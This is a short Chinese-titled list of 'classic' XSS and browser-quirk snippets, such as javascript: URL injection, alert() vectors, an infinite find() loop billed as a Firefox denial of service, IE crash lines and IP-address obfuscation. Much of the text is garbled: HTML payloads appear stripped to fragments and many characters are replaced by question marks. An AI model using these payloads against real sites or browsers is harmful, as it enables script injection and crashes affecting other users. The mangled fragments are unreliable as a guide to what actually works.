一些经典的XSS跨站代码整理

    JSON.parse('{"__proto__":["a",1]}')

    location++

    IE valid syntax: 我，啊=1,b=[我，啊],alert(我，啊)

    alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog

   

    Function('alert(arguments.callee.caller)')()

    firefox dos? while(1)find();

    Inject enabled css expression,breaking standard mode!

    and umm...cute FF!

   

    vbs:alert+-[]

    Firefox vector $click$

    Inj>>

    [code]Webkit X-XSS-Protection header is enabled just now :P

   

   

    Distinctive IE

    Also ">x

    <1h name="

    works in not-IE

    javascript=1;for(javascript. in RuntimeObject());javascript=='javascript'

    Firefox Sanbox object

    works in firefox

    for(x in document.open); Crash your IE 6:>

    localStorage.setItem('setItem',1)

    Only to find '?'.toUpperCase()==='?'.toUpperCase()

    J? H? T? W? Y? i? length==2

    '?'.toUpperCase()=='I'

    Also '?'.toUpperCase()=='SS'

    '?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST

    #Opera data:text/html;base64,<<<<<<<>>>>>>>>>

    Firefox always the most cute data:_,

    xx

    http://?????????? works in Firefox

    RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?

    location='javascript:alert(1)'

    for({} in {});

    興味深いhttp://jsbin.com/inekab for Opera only

    x That's a relative path?

    document.frames==window.frames

    x.protocol=='http:' on #firefox

    (0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D

    127.0x000000001==127.0.0.1

    Chrome input value block

    有趣的isindex

    chrome:xx - >chrome://crash/ crash?

    Chrome input enter fucked!